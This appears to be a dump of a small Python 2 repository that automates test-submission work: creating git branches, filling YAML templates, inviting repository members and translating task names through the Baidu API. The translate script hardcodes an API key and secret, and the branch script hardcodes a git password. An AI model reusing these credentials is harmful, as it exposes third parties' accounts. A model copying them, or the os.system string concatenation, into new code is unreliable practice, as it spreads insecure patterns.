1]['repo_name']\n prefix = yamlContent['project_list'][repo_index - 1]['prefix']\n\n pm_name = ''\n task_name = 
''\n\n print ('\\n')\n print('-----------------------------------')\n print('生成 feature/时间_任务名称')\n print('例子 feature/20190516_时间打点')\n print('-----------------------------------')\n print('-----------------------------------')\n print('pm列表:')\n count = 0\n for p in yamlContent['pm_list']:\n count += 1\n print(str(count)+'.'+p)\n pm_index = int(raw_input('请输入PM名字索引:'))\n pm_name = yamlContent['pm_list'][pm_index-1]\n print('-----------------------------------')\n\n \n print ('\\n')\n print('-----------------------------------')\n while task_name == '':\n task_name = raw_input('请输入任务名称(不要带空格):')\n print('-----------------------------------')\n\n\n taskName = getGitBranchNameFromTaskName(task_name)\n\n date_string = time.strftime(\"%Y%m%d\",time.localtime())\n\n just_test_branch = date_string + '_' + taskName #用作文件名\n\n test_branch = 'feature/' + date_string + '_' + taskName\n print ('\\n')\n print ('\\n')\n\n in_text = ''\n \n test_options = ''\n \n print('-----------------------------------')\n print('项目测试项:---------一行一个---------')\n print('相机优化 ')\n print('主任务列表优化 ')\n print('最后输入 q 回车 结束输入')\n print('-----------------------------------')\n print('请输入项目测试项:')\n\n count = 0\n\n while in_text != 'q':\n count += 1\n in_text = raw_input()\n if in_text != 'q':\n test_options += str(count) + '.' + in_text\n test_options += '\\n'\n print('-----------------------------------')\n\n print ('\\n')\n\n\n\n \n#git 打新分支 默认 feature/xxx\n\n repo = Repo('~/' + repo_name)\n master = repo.heads.master\n currentBranch = repo.head.reference\n if currentBranch != master:\n master.checkout()\n git = repo.git\n git.checkout('master',b=test_branch)\n\n print('切分支成功:')\n print(test_branch)\n\n#yaml文件更新\n\n config = TemplateConfig()\n config.readConfigFromTemplate()\n \n config.git_branch = test_branch\n config.git_project_name = repo_name\n config.test_options = test_options\n config.project_pm = pm_name\n config.project_name = prefix + ' ' + task_name\n\n yaml_name = just_test_branch+'_config.yaml'\n path = os.path.dirname(os.path.realpath(__file__))\n yamlPath = os.path.join(path,'configs/' + yaml_name)\n\n if not os.path.isfile(yamlPath):\n os.system(\"touch \" + yamlPath)\n\n path = os.path.dirname(os.path.realpath(__file__))\n with io.open(path+'/configs/configs','a',encoding='utf-8') as f:\n f.write(yaml_name)\n f.write(u'\\n')\n\n config.save(yamlPath)\n\n print('存储到本地配置成功:')\n print(test_options)\n\ndef main(argv):\n create()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n#可优化:1.项目名称和产品通过配置文件 2.自动抓取上一次对应项目的模版\n" }, { "alpha_fraction": 0.35117772221565247, "alphanum_fraction": 0.35974302887916565, "avg_line_length": 27.303030014038086, "blob_id": "74384e66abf23ce402cc63dc0a0f0d80d5938859", "content_id": "a4f67435ac92969432345e3fbf576ed27d24faf4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1048, "license_type": "permissive", "max_line_length": 68, "num_lines": 33, "path": "/checkin.py.command", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport inviteMember\nimport createProject\nimport sendEmail\nimport sys\n\n\n\ndef main(argv):\n print('\\n')\n print('-------------------------------------------------------')\n print('-------------------------------------------------------')\n print(' 功能list ')\n print('-------------------------------------------------------')\n print('1.创建提测任务(master切分支,创建提测邮件一部分).')\n# print('\\n')\n print('2.发提测邮件(选提测任务)')\n# 
print('\\n')\n print('3.邀请人员进指定库(目前只有iOS的可以用)')\n print('-------------------------------------------------------')\n print('-------------------------------------------------------')\n type = int(raw_input('输入选择项:'))\n if type == 1:\n createProject.create()\n elif type == 2:\n sendEmail.send()\n elif type == 3:\n inviteMember.invite()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n" }, { "alpha_fraction": 0.6098256707191467, "alphanum_fraction": 0.6110935211181641, "avg_line_length": 30.86868667602539, "blob_id": "4d03167a739d7c9acdda793c6c62467fd351478b", "content_id": "30c0f3b475568130363dd956d4b39cb68efbcb36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3341, "license_type": "permissive", "max_line_length": 110, "num_lines": 99, "path": "/template/templateManager.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport ruamel.yaml\nfrom ruamel.yaml.util import load_yaml_guess_indent\n\nimport os\nimport sys\n\n\nclass TemplateConfig:\n \n yamlContent = None\n ind = None\n bsi = None\n \n project_name=\"\" #项目名称\n project_number=\"\" #项目标号\n git_project_name=\"\" #git工程\n git_branch=\"\" #提测分支\n self_is_test=\"\"\"是 / dev环境\"\"\" #研发是否自测\n test_options=\"\" #提测功能项\n review_members=\"\"#代码Review人员\n project_pm=\"\"#产品\n project_developers=\"\"#开发\n project_pr_diff=\"\"#提测内容pr\n project_ui=\"\"#ui人员\n poject_comment=\"\"#备注\n online_time=\"\"#预计上线时间\n \n #部署发布顺序\n #上线发布的分支\n #上线时间\n #测试报告\n \n def readConfig(self,path):\n yamlContent,ind,bsi = load_yaml_guess_indent(open(path.decode('utf-8')))\n \n self.git_project_name = yamlContent['git_project_name']\n self.project_name = yamlContent['project_name']\n self.git_branch = yamlContent['git_branch']\n self.test_options = yamlContent['test_options']\n self.review_members = yamlContent['review_members']\n self.project_pm = yamlContent['project_pm']\n self.project_developers = yamlContent['project_developers']\n self.poject_comment = yamlContent['poject_comment']\n self.project_ui = yamlContent['project_ui']\n self.project_pr_diff = yamlContent['project_pr_diff']\n \n self.yamlContent = yamlContent\n self.ind = ind\n self.bsi = bsi\n \n def readConfigFromTemplate(self):\n\n path = os.path.dirname(os.path.realpath(__file__))\n \n configs_path = os.path.join(path,'template.yaml')\n \n self.readConfig(configs_path)\n\n def save(self,path):\n \n self.yamlContent['git_project_name'] = self.git_project_name\n self.yamlContent['project_name'] = self.project_name\n self.yamlContent['git_branch'] = self.git_branch\n self.yamlContent['test_options'] = self.test_options\n self.yamlContent['review_members'] = self.review_members\n self.yamlContent['project_pm'] = self.project_pm\n self.yamlContent['project_developers'] = self.project_developers\n self.yamlContent['poject_comment'] = self.poject_comment\n self.yamlContent['project_ui'] = self.project_ui\n self.yamlContent['project_pr_diff'] = self.project_pr_diff\n ruamel.yaml.round_trip_dump(self.yamlContent,open(path,'w'),indent=self.ind,block_seq_indent=self.bsi)\n\n def log(self):\n print('项目名称:'+self.project_name)\n print('提测分支:'+self.git_branch)\n print('测试项:'+self.test_options)\n print('代码review人员:'+self.review_members)\n print('pm:'+self.project_pm)\n print('开发者:'+self.project_developers)\n print('备注:'+self.poject_comment)\n print('git工程:'+self.git_project_name)\n print('ui:'+self.project_ui)\n print('pr:'+self.project_pr_diff)\n\n\n\n\nif __name__ 
== \"__main__\":\n \n if sys.getdefaultencoding() != 'utf-8':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n \n config = TemplateConfig()\n config.readConfigFromTemplate()\n config.log()\n" }, { "alpha_fraction": 0.5784832239151001, "alphanum_fraction": 0.6102292537689209, "avg_line_length": 22.625, "blob_id": "f573fc09236e215222c75c39b95db3641d99ac43", "content_id": "6cbf823be238036a403696ec12c205c2a6e79adc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1158, "license_type": "permissive", "max_line_length": 120, "num_lines": 48, "path": "/framework/translate.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#/usr/bin/env python\n#coding=utf8\n \nimport httplib\nimport md5\nimport urllib\nimport random\nimport json\n\nappid = '20190601000303970' #你的appid\nsecretKey = 'nGFLJErsGa1OODBkOQ35' #你的密钥\n\n\ndef translate_baidu(content):\n\n httpClient = None\n myurl = '/api/trans/vip/translate'\n q = content\n fromLang = 'zh'\n toLang = 'en'\n salt = random.randint(32768, 65536)\n\n sign = appid+q+str(salt)+secretKey\n m1 = md5.new()\n m1.update(sign)\n sign = m1.hexdigest()\n myurl = myurl+'?appid='+appid+'&q='+urllib.quote(q)+'&from='+fromLang+'&to='+toLang+'&salt='+str(salt)+'&sign='+sign\n \n try:\n httpClient = httplib.HTTPConnection('api.fanyi.baidu.com')\n httpClient.request('GET', myurl)\n \n #response是HTTPResponse对象\n response = httpClient.getresponse()\n result = response.read().decode('utf-8')\n result = json.loads(result)\n return result['trans_result'][0]['dst']\n except Exception, e:\n print(e)\n return content\n finally:\n if httpClient:\n httpClient.close()\n\n\nif __name__ == \"__main__\":\n result = translate_baidu('5月优化')\n print(result)\n" }, { "alpha_fraction": 0.6547825932502747, "alphanum_fraction": 0.656521737575531, "avg_line_length": 22.4489803314209, "blob_id": "543319cff43ec0ad1064001008f0213631b600c6", "content_id": "05ee27857920ec1526362bce651bc66c785f9270", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1206, "license_type": "permissive", "max_line_length": 69, "num_lines": 49, "path": "/inviteMember.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport getopt\nimport sys\nimport os\n\npath = os.path.dirname(os.path.realpath(__file__))\npath = path+'/framework'\nsys.path.append(path)\nimport requestLenz\nfrom requestLenz import LenzRequest\n\nimport ruamel.yaml\nfrom ruamel.yaml.util import load_yaml_guess_indent\n\n#工程配置(git账户密码,邮箱账户密码等等)\nclass ProjectConfig:\n \n config = None\n \n def read(self):\n path = os.path.dirname(os.path.realpath(__file__))\n path = os.path.join(path,'config.yaml')\n yamlContent,ind,bsi = load_yaml_guess_indent(open(path))\n self.config = yamlContent\n\np_config = ProjectConfig()\np_config.read()\n\ndef invite():\n \n requestLenz.request_config_username = p_config.config['git_user']\n requestLenz.request_config_password = p_config.config['git_pass']\n \n request = LenzRequest('ppz_bj','')\n \n repo = raw_input('输入要邀请的项目(LenzBusiness):')\n members = ['btcxiaowu','zhang_jack','Lenz_ydd']\n for member in members:\n result = request.inviteRepoMember(member,repo)\n print(str(result))\n\n\ndef main(argv):\n invite()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n" }, { "alpha_fraction": 0.6095890402793884, "alphanum_fraction": 0.6164383292198181, "avg_line_length": 21.901960372924805, 
"blob_id": "2d6b34e9add9538e9341a8f54c20fabded403648", "content_id": "3c601ff8b2793900661c48dfe22d9b98b6646680", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "permissive", "max_line_length": 70, "num_lines": 51, "path": "/createBranch.py.command", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport getopt\nimport sys\nimport os\nimport time\n\npath = os.path.dirname(os.path.realpath(__file__))\npath = path+'/framework'\nsys.path.append(path)\nimport requestLenz\nfrom requestLenz import LenzRequest\n\ndef create():\n if sys.getdefaultencoding() != 'utf-8':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n requestLenz.request_config_username = '[email protected]'\n requestLenz.request_config_password = 'zxcv12'\n \n repo = ''\n type = int(raw_input('请输入要创建分支的工程(1-LenzBusiness 2-LenzMember):'))\n if type == 1:\n repo = 'LenzBusiness'\n elif type == 2:\n repo = 'LenzMember'\n\n input_branch = raw_input('输入要创建的分支:')\n\n request = LenzRequest('ppz_bj',repo)\n\n date_string = time.strftime(\"%Y%m%d\",time.localtime())\n\n branch = 'rtag/'+date_string+'_'+input_branch\n request.createNewBranch(branch,'master')\n\n json = request.getAllBranches()\n list = []\n for dict in json:\n list.append(dict['name'])\n\n for item in list:\n if item == branch:\n print('创建成功:'+item)\n\ndef main(argv):\n create()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n" }, { "alpha_fraction": 0.7243402004241943, "alphanum_fraction": 0.7478005886077881, "avg_line_length": 23.35714340209961, "blob_id": "346bf6c7840c2cafbe3fb03eaab8083ef58a6020", "content_id": "5faf84ed8e05466301af7427d49c5c1aed25c2e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 723, "license_type": "permissive", "max_line_length": 86, "num_lines": 14, "path": "/README.md", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "# checkinTestManage\n\n## 该python脚本 主要为了发提测邮件加速。\n### 功能list:\n### 1.创建提测项目:\n 1)切好本地分支\n 2)创建提测模版并填写一部分\n### 2.发提测邮件:\n 1)选择已经创建的提测模版 然后等待用户对模版做最后的改动,最后提测\n\n# 说明\n## 1.其中创建提测项目时,输入中文项目名称会根据中文翻译成英文拼上时间填入分支项并git切分支\n## 2.发邮件时,拉git分支和master对比,然后筛选出开发者\n## 3.发邮件时,会通过gitee api创建pr 然后通过pr获取commit list,然后对commit list进行过滤最后写入备注中(备注内容为开发修改了什么)\n" } ]
8
rijish45/UPS
https://github.com/rijish45/UPS
f5e0c0eb1f99fee420043fb6a64b0071069b7211
21331e2a266cdc3c18476f285817c125622ecc32
13f08981b436524ce1ca0e88b8d47776d07e0402
refs/heads/master
2020-05-07T12:15:49.343821
2019-05-01T16:32:04
2019-05-01T16:32:04
180,496,631
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7435687184333801, "alphanum_fraction": 0.7454844117164612, "avg_line_length": 37.05208206176758, "blob_id": "3113e81c7f567565a06bc0a4fe2d742718c82cd2", "content_id": "3e49796d058a5ce6ae8028624b148fc1cb4a97e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3654, "license_type": "no_license", "max_line_length": 243, "num_lines": 96, "path": "/Server-App/server/handle_requests.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef _HANDLE_REQUESTS_\n#define _HANDLE_REQUESTS_\n\n#include <iostream>\n#include <cstdlib>\n#include <algorithm>\n#include <cmath>\n#include <ctime>\n#include <vector>\n#include <pqxx/pqxx>\n#include <string>\n#include <fstream>\n#include <mutex>\n\n\nusing namespace std;\nusing namespace pqxx;\n\n//New function\nstring get_owner_id_from_username(connection * C, string username);\n\n\n//max fucntions\n//Get max-num\nint max_sequence_num(connection * C);\nint max_package_num(connection * C);\nint max_order_id(connection * C);\n\n\n/*\n vector < vector<string> > my_vec (1000);\n get_parameter_based_on_dest(C, my_vec);\n for (int it = 0; it != my_vec.size(); it++){\n for(int i = 0; i != 3; i++)\n cout << my_vec[it][i] << endl;\n }\n */\n\n\nvoid get_parameter_based_on_dest(connection * C, vector< vector<string> > & my_vec);\nvoid packed_packages(connection * C, vector<int> & package_vec, string whx_position, string why_position, string truck_id);\nbool packageExist(connection * C, string packageid);\nbool isExist(connection * C, string username);\nvoid drop_all_tables(connection * C);\n\n\n//functions for order_table\nvoid insert_into_order_table(connection * C, string orderid, string package_num_id);\nstring get_package_id_for_order(connection * C, string order_id);\nstring get_order_id_for_package(connection * C, string package_id);\n\n\n//World table functions\nvoid insert_current_world_id(connection * C, string name, string worldid, string id);\nstring get_world_id(connection * C, string name);\n\n\n//functions you wanted\nvoid update_truck_field_of_package(connection * C, string packageid, string value);\nvoid update_acked_of_seqnum(connection * C, string seq, bool val);\nbool get_seqnum_acked_or_not(connection * C, string seqnum); \n\n\n//Update functions\nvoid update_package_destination(connection * C, string packageid, string new_x, string new_y);\nvoid update_package_warehouse_location_and_id(connection * C, string warehouse_id, string warehouse_x, string warehouse_y, string packageid);\nvoid update_status_of_package (connection * C, string packageid, string new_status);\nvoid update_truck_status(connection * C, string truck_id, string new_status);\nvoid update_location_of_package(connection * C, string x_position, string y_position);\n\n//Insert functions\nvoid insert_package(connection * C, string packageid, string username, string truck_id, string item, string status, string warehouse_id, string warehouse_x , string warehouse_y, string x_position, string y_position, string destination_update);\nvoid insert_truck(connection * C, string truckid, string status);\nvoid insert_sequence_num(connection * C, string seq_num, string ackedornot);\nvoid clear_all_tables(connection * C);\nbool check_seq_num_exists(connection * C, string seq_num);\n\n\n//Get item from package table\nstring get_truck_id_for_a_particular_package(connection * C, string packageid); //new\nstring get_xposition_of_a_package(connection * C, string packageid); //new\nstring 
get_yposition_of_a_package(connection * C, string packageid); //new\nstring get_package_status(connection * C, string packageid); //new\nstring get_item_description(connection * C, string packageid); //new\nstring get_warehouse_id_of_package(connection * C, string packageid);\nstring get_warehouse_xposition(connection * C, string packageid); //new\nstring get_warehouse_yposition(connection * C, string packageid); //new\nstring get_owner_id_of_package(connection * C, string packageid); //new\nstring get_username(connection *C , string packageid);\n\n//Get item from truck table\nstring get_truck_status(connection * C, string truckid);\nstring get_truck_id_for_a_particular_status(connection * C, string status);\n\n\n#endif\n\n" }, { "alpha_fraction": 0.6216922998428345, "alphanum_fraction": 0.6353846192359924, "avg_line_length": 29.06046485900879, "blob_id": "c126d27eb39c9508e67041a3d4a802d21e2ac76c", "content_id": "febe283bc4bcff69ceec0bbe7646378b616b4bc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6500, "license_type": "no_license", "max_line_length": 86, "num_lines": 215, "path": "/Server-App/server/amazonMsg.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"amazonMsg.hpp\"\n\n// Listener amazonMsg::listener;\nConnector amazonMsg::connector;\namazonMsg * amazonMsg::instance = 0;\ngoogle::protobuf::io::FileOutputStream * amazonMsg::out;\ngoogle::protobuf::io::FileInputStream * amazonMsg::in;\nListener amazonMsg::listener;\ngoogle::protobuf::io::FileOutputStream * amazonMsg::listenerOut = nullptr;\ngoogle::protobuf::io::FileInputStream * amazonMsg::listenerIn = nullptr;\nmutex amazonMsg::mtx_connector_in;\nmutex amazonMsg::mtx_connector_out;\nmutex amazonMsg::mtx_listener_in;\nmutex amazonMsg::mtx_listener_out;\nSocket amazonMsg::tempListener;\n\namazonMsg * amazonMsg::getInstance() {\n if (instance == 0) {\n instance = new amazonMsg();\n connector = move(Connector(CONNECT_HOST , CONNECT_PORT));\n out = new google::protobuf::io::FileOutputStream(connector.getSocket());\n in = new google::protobuf::io::FileInputStream(connector.getSocket());\n listener = Listener(LISTEN_PORT);\n }\n return instance;\n}\n\nvoid amazonMsg::acceptConnection() {\n if (listenerOut != nullptr) {\n delete(listenerOut);\n }\n if (listenerIn != nullptr) {\n delete(listenerIn);\n }\n tempListener = listener.Accept();\n // cout << tempListener.getSocket() << endl;\n listenerOut = new google::protobuf::io::FileOutputStream(tempListener.getSocket()); \n listenerIn = new google::protobuf::io::FileInputStream(tempListener.getSocket());\n}\n\nbool amazonMsg::buildConnection(int worldid) {\n U2AConnect uconnect;\n uconnect.set_worldid(worldid);\n sendMesgTo(uconnect, out);\n U2AConnected response;\n cout << \"DEBUG CONNECTION\" << endl;\n recvMesgFrom(response, in);\n cout << \"Message is \" << endl;\n // cout << response.DebugString();\n if (response.result() == \"connected!\") {\n cout << response.result() << endl;\n return true;\n }\n return false;\n}\n\n// message PickupResponse{\n// required int64 seqnum = 1;\n// required int64 tracknum = 2;\n// required int64 orderid = 3;\n// required int64 truckid = 4;\n// }\n\nvoid amazonMsg::pickUpRes(int seqnum, int tracknum, int orderid, int truckid) {\n U2AResponse response;\n PickupResponse * pickup = response.add_pickup();\n pickup->set_seqnum(seqnum);\n pickup->set_tracknum(tracknum);\n pickup->set_orderid(orderid);\n pickup->set_truckid(truckid);\n lock_guard<mutex> lck 
(mtx_listener_out);\n cout << \"PICKUPRES\" << endl;\n sendMesgTo(response, listenerOut);\n}\n\n// message DeliveryResponse{\n// required int64 seqnum = 1;\n// required int64 tracknum = 2;\n// }\n \nvoid amazonMsg::deliverRes(int seqnum, int tracknum) {\n U2AResponse response;\n DeliveryResponse * delivery = response.add_delivery();\n delivery->set_seqnum(seqnum);\n delivery->set_tracknum(tracknum);\n lock_guard<mutex> lck (mtx_listener_out);\n sendMesgTo(response, listenerOut);\n}\n\n// message ErrorMessage{\n// required string err = 1;\n// required int64 originseqnum = 2;\n// required int64 seqnum = 3;\n// }\n\nvoid amazonMsg::sendError(string err, int originseqnum, int seqnum) {\n U2AResponse response;\n ErrorMessage * error = response.add_error();\n error->set_err(err);\n error->set_originseqnum(originseqnum);\n error->set_seqnum(seqnum);\n lock_guard<mutex> lck (mtx_listener_out);\n sendMesgTo(response, listenerOut);\n}\n\nvoid amazonMsg::sendAck(int ack) {\n U2AResponse response;\n response.add_ack(ack);\n lock_guard<mutex> lck (mtx_listener_out);\n sendMesgTo(response, listenerOut);\n}\n\n// message A2URequest {\n// repeated PickupRequest pickup = 1;\n// repeated DeliveryRequest delivery = 2;\n// repeated int64 ack = 3;\n// }\nvoid amazonMsg::receiveRes(A2URequest & req) {\n lock_guard<mutex> lck (mtx_listener_in);\n recvMesgFrom(req, listenerIn);\n \n // if (req.pickup_size() != 0) {\n // for (int i = 0; i < req.pickup_size(); i++) {\n // cout << \"pickup requset from amazon\" << endl;\n // cout << req.pickup(i).seqnum() << endl;\n // cout << req.pickup(i).orderid() << endl;\n // cout << req.pickup(i).productname() << endl;\n // cout << req.pickup(i).wh_id() << endl;\n // cout << req.pickup(i).wh_x() << endl;\n // cout << req.pickup(i).wh_y() << endl;\n // cout << req.pickup(i).dest_x() << endl;\n // cout << req.pickup(i).dest_y() << endl;\n // if (req.pickup(i).has_upsaccount()) {\n // \tcout << req.pickup(i).upsaccount() << endl;\n // }\n // }\n // }\n\n // if (req.ack_size() != 0) {\n // for (int i = 0; i < req.ack_size(); i++) {\n // cout << \"ack from amazon\" << endl;\n // cout << req.ack(i) << endl;\n // }\n // }\n\n // message DeliveryRequest{\n // required int64 seqnum = 1;\n // required int64 tracknum = 2;\n // }\n \n // if (req.delivery_size() != 0) {\n // for (int i = 0; i < req.delivery_size(); i++) {\n // cout << \"delivery request from amazon\" << endl;\n // req.delivery(i).seqnum();\n // req.delivery(i).tracknum();\n // }\n // }\n \n}\n\n\n// message UpdateDest{\n// required int64 seqnum = 1;\n// required int64 tracknum = 2;\n// required int64 new_x = 3;\n// required int64 new_y = 4;\n// required string newDest = 3;\n// }\nvoid amazonMsg::updateDestination(int seqnum, int tracknum, int new_x, int new_y) {\n U2ARequest req;\n UpdateDest * updatedAddr = req.add_dest();\n updatedAddr->set_seqnum(seqnum);\n updatedAddr->set_tracknum(tracknum);\n updatedAddr->set_new_x(new_x);\n updatedAddr->set_new_y(new_y);\n lock_guard<mutex> lck (mtx_connector_out);\n sendMesgTo(req, out);\n}\n\nvoid amazonMsg::sendAck22222(int ack) {\n U2ARequest req;\n req.add_ack(ack);\n lock_guard<mutex> lck (mtx_connector_out);\n sendMesgTo(req, out);\n}\n\n\n// message ErrorMessage{\n// required string err = 1;\n// required int64 originseqnum = 2;\n// required int64 seqnum = 3;\n// }\n\nvoid amazonMsg::receiveDestUpdatedRes(A2UResponse & response) {\n lock_guard<mutex> lck (mtx_connector_in);\n recvMesgFrom(response, in);\n \n // if (response.error_size() != 0) {\n // for (int i = 0; i < 
response.error_size(); i++) {\n // cout << \"error message from amazon\" << endl;\n // cout << response.error(i).err() << endl;\n // cout << response.error(i).originseqnum() << endl;\n // cout << response.error(i).seqnum() << endl;\n // // amazon->sendAck22222(response.error(i).seqnum());\n // }\n // }\n\n // if (response.ack_size() != 0) {\n // for (int i = 0; i < response.ack_size(); i++) { \n // cout << \"ack from amazon\" << endl;\n // cout << response.ack(i) << endl;\n // // update_acked_of_seqnum(C, to_string(response.ack(i)), true)\n // }\n // }\n}\n\n\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6897374987602234, "alphanum_fraction": 0.6897374987602234, "avg_line_length": 36.818180084228516, "blob_id": "f6ae806d89e04f36659f411bbeec33e6d3bde33f", "content_id": "f4a590922250be5839bcfd08f7a81f4a6b819925", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 419, "license_type": "no_license", "max_line_length": 104, "num_lines": 11, "path": "/Django-App/web-app/upsApp/urls.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . import views\n\napp_name = 'upsApp'\nurlpatterns = [\n path('', views.PackageListView.as_view(), name='packages'),\n path('<int:pk>/update/', views.PackageUpdate.as_view(), name='package_update'),\n path('shipment/', views.ShipmentListView.as_view(), name='shipment'),\n path('shipment/search', views.ShipmentSearchListView.as_view(), name='shipment_search_list_view'), \n]\n\n\n\n" }, { "alpha_fraction": 0.71100914478302, "alphanum_fraction": 0.71100914478302, "avg_line_length": 30.035715103149414, "blob_id": "fac461b59828e44a0a396da3b6006a14437c05c1", "content_id": "54022c07be33febbabf7bc0b7df596b17c79136a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 872, "license_type": "no_license", "max_line_length": 67, "num_lines": 28, "path": "/Django-App/web-app/accounts/views.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views import generic\nfrom django.contrib.auth import login, authenticate\nfrom .forms import UserForm\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\n\ndef signup(request):\n\tif request.method == 'POST':\n\t\tform = UserForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnewUser = User.objects.create(\n\t\t\t\tusername = form.cleaned_data.get('username'),\n\t\t\t)\n\t\t\tnewUser.set_password(form.cleaned_data.get('password'))\n\t\t\tnewUser.save() \n\t\t\ttempUser = authenticate(\n\t\t\t\tusername = form.cleaned_data.get('username'), \n\t\t\t\tpassword = form.cleaned_data.get('password'),\n\t\t\t)\n\t\t\tlogin(request, tempUser)\n\t\t\treturn redirect('/') # direct to the home page\n\telse:\n\t\tform = UserForm()\n\treturn render(request, 'registration/signup.html', {'form': form})\n\n\n\n" }, { "alpha_fraction": 0.5661538243293762, "alphanum_fraction": 0.5753846168518066, "avg_line_length": 15.25, "blob_id": "623288fb9079e57ba38eb1ddeacb1954b79c7e68", "content_id": "999aa9eb4832d19f52927216a03f23fd1f0b864d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 325, "license_type": "no_license", "max_line_length": 52, "num_lines": 20, "path": "/Server-App/server/Makefile", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", 
"text": "CFLAGS=-std=c++14 -pedantic -Wall -O3\nSRCS=$(wildcard *.cpp)\nOBJS=$(patsubst %.cpp, %.o, $(SRCS))\n\nserver: $(OBJS)\n\tg++ -o $@ $(OBJS) -lpq -lpthread -lpqxx -lprotobuf\n\n\n%.o:%.cpp\n\tg++ $(CFLAGS) -c $<\n\n.PHONY: clean depend\nclean:\n\trm -f server *.o *~ *\\#\n\ndepend:\n\tmakedepend $(SRCS)\n # DO NOT DELETE\n\n# DO NOT DELETE\n" }, { "alpha_fraction": 0.746835470199585, "alphanum_fraction": 0.8101266026496887, "avg_line_length": 10.285714149475098, "blob_id": "7c07085384700ef307c6ff4cab900069434d11b5", "content_id": "e16d8a491cb68911e91004f1b4e9184a46954f43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 79, "license_type": "no_license", "max_line_length": 19, "num_lines": 7, "path": "/Server-App/server/requirements.txt", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "Django>=2.0,<3.0\nprotobuf\nsqlalchemy\ndjango-crispy-forms\npsycopg2\nPillow\nnumpy\n" }, { "alpha_fraction": 0.6967471241950989, "alphanum_fraction": 0.6988457441329956, "avg_line_length": 25.47222137451172, "blob_id": "649ef678beabc63fd696349d24ce87ad2961c3d5", "content_id": "e7b273b1917e211eb485c8c1bff3657047896ebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1906, "license_type": "no_license", "max_line_length": 86, "num_lines": 72, "path": "/Server-App/server/socket.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef __SOCKET__\n#define __SOCKET__\n\n#include <cstdio>\n#include <cstdlib>\n#include <iostream>\n#include <unistd.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <cstring>\n#include <netdb.h>\n#include <utility>\n#include <google/protobuf/message.h>\n#include <google/protobuf/descriptor.h>\n#include <google/protobuf/io/zero_copy_stream_impl.h>\n#include <google/protobuf/io/coded_stream.h>\n#include <google/protobuf/io/zero_copy_stream_impl_lite.h>\n#include \"world_ups.pb.h\"\n#include \"UA.pb.h\"\n\n#define BUF_SIZE 812 \n#define CH_SIZE 1\n\nusing namespace std;\n\nclass Socket {\nprotected:\n int socket_fd;\nprivate:\n string recvMessage(size_t bytes); // reveive all message (unnecessary to be virtual)\n int parseBytes();\npublic:\n const int getSocket() const { return socket_fd; };\n Socket();\n Socket(int __socket_fd);\n Socket(const Socket & rhs) = delete; // copy constructor\n Socket & operator=(const Socket & rhs) = delete; // assignment operator\n Socket(Socket && rhs) noexcept;\n Socket& operator=(Socket && rhs) noexcept;\n bool isValid();\n virtual ~Socket();\n};\n\nclass Listener : public Socket {\n // socket_fd\n const char * port;\npublic:\n Listener() = default;\n Listener(const char * _port);\n Listener(const Listener & rhs) = delete; // copy constructor\n Listener & operator=(const Listener & rhs) = delete; // assignment operator \n Listener(Listener && rhs) noexcept;\n Listener & operator=(Listener && rhs) noexcept;\n Socket Accept();\n ~Listener();\n};\n\nclass Connector : public Socket {\n const char * host;\n const char * port;\npublic:\n Connector() = default;\n Connector(const char * host, const char * port);\n Connector(const Connector & rhs) = delete; // copy constructor\n Connector & operator=(const Connector & rhs) = delete; // assignment operator\n Connector (Connector && rhs) noexcept;\n Connector & operator=(Connector && rhs) noexcept;\n 